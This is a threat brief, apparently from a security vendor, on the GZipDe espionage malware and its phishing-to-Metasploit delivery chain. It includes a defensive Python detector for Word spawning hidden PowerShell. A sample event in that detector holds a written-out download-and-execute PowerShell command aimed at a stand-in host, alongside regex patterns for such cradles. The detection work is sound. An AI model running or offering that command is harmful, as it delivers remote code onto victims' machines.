What Is It?
Researchers from AlienVault have published a report detailing a new piece of malware called GZipDe. They believe it may be part of a targeted cyber-espionage campaign whose final payload is a Metasploit backdoor. This attack is consistent with a growing trend among threat actors of using standard tools, such as Metasploit, as part of their attack chain. In May, researchers at ESET described a new campaign by the Russia-based Advanced Persistent Threat (APT) group Turla which used a Metasploit backdoor as its first-stage compromise.
The GZipDe attack begins with a spear phishing email containing a Word document, which includes a malicious Visual Basic macro. The text of the document is an article published by the Middle East North Africa Financial Network in late May 2018, regarding the Shanghai Cooperation Organization Summit in June 2018. The title of this article is “Afghanistan – ‘Shanghai Spirit’ Contributes to Afghan Peace.” Though the text is in English, the document was uploaded to VirusTotal from an IP address located in Afghanistan.
If a user who opens the malicious document is convinced via social engineering to allow the macro to execute, a hidden window launches a PowerShell command that downloads and executes a first-stage piece of malware (no sample of which was available at the time of AlienVault's analysis), which in turn retrieves the GZipDe malware itself. The GZipDe sample is compressed using zip and encrypted with a customized routine in order to avoid signature-based detection. It then downloads the Metasploit backdoor payload, which uses shellcode in an attempt to avoid detection and, if successful, is loaded entirely into memory. The backdoor can collect and send system information and receive instructions, such as downloading further malware.
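As an added illustration (not code from the BluVector or AlienVault reports), the following Python flags process-creation events that match the delivery chain described above: an Office process spawning a hidden PowerShell that downloads and runs further content. The event format, field names and sample lines are constructed assumptions, not telemetry from the campaign.

```python
import re

# Parent processes that should rarely spawn a shell; Word is the one used by GZipDe.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

# Indicators of a hidden window, a download cradle and in-memory execution.
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
DOWNLOAD_CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|iwr\b|net\.webclient", re.IGNORECASE)
IN_MEMORY_EXEC = re.compile(r"\biex\b|invoke-expression|frombase64string", re.IGNORECASE)

def parse_event(line):
    """Parse a constructed 'key=value|key=value' process-creation record into a dict."""
    return dict(field.split("=", 1) for field in line.strip().split("|"))

def score_event(event):
    """Return the list of matched indicators for one event (empty if not of interest)."""
    parent = event.get("parent", "").rsplit("\\", 1)[-1].lower()
    image = event.get("image", "").rsplit("\\", 1)[-1].lower()
    cmd = event.get("cmdline", "")
    if parent not in OFFICE_PARENTS or image not in SHELLS:
        return []
    hits = ["office_spawns_powershell"]
    if HIDDEN_WINDOW.search(cmd):
        hits.append("hidden_window")
    if DOWNLOAD_CRADLE.search(cmd):
        hits.append("download_cradle")
    if IN_MEMORY_EXEC.search(cmd):
        hits.append("in_memory_execution")
    return hits

def detect(lines):
    """Return {event_id: [indicators]} for events that merit analyst attention."""
    findings = {}
    for line in lines:
        ev = parse_event(line)
        hits = score_event(ev)
        # Office -> PowerShell alone is noisy; require at least one behavioural indicator too.
        if len(hits) >= 2:
            findings[ev["id"]] = hits
    return findings

# Constructed sample events (not real telemetry from the campaign).
SAMPLE_EVENTS = [
    "id=1|parent=C:\\Program Files\\Microsoft Office\\WINWORD.EXE|image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|cmdline=powershell -WindowStyle Hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage1')",
    "id=2|parent=C:\\Windows\\explorer.exe|image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|cmdline=powershell -File C:\\scripts\\backup.ps1",
    "id=3|parent=C:\\Program Files\\Microsoft Office\\WINWORD.EXE|image=C:\\Windows\\System32\\cmd.exe|cmdline=cmd /c echo hello",
]

if __name__ == "__main__":
    for event_id, hits in detect(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(hits)}")
```

Only event 1 is reported; the benign PowerShell launched from Explorer and the Word-spawned cmd.exe without behavioural indicators are left alone, which is the trade-off a production rule would tune against its own baseline.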
How Does It Propagate?
The malware does not contain the code necessary to self-propagate. The attack vector appears to be spear phishing emails containing malicious documents, which still require social engineering of the recipient to allow the malicious macro to execute.
When/How Did BluVector Detect It?
There are four samples publicly available related to this attack and BluVector’s patented Machine Learning Engine (MLE) detected them all. Regression testing has shown that these GZipDe samples would have been detected an average of 28 months prior to their release.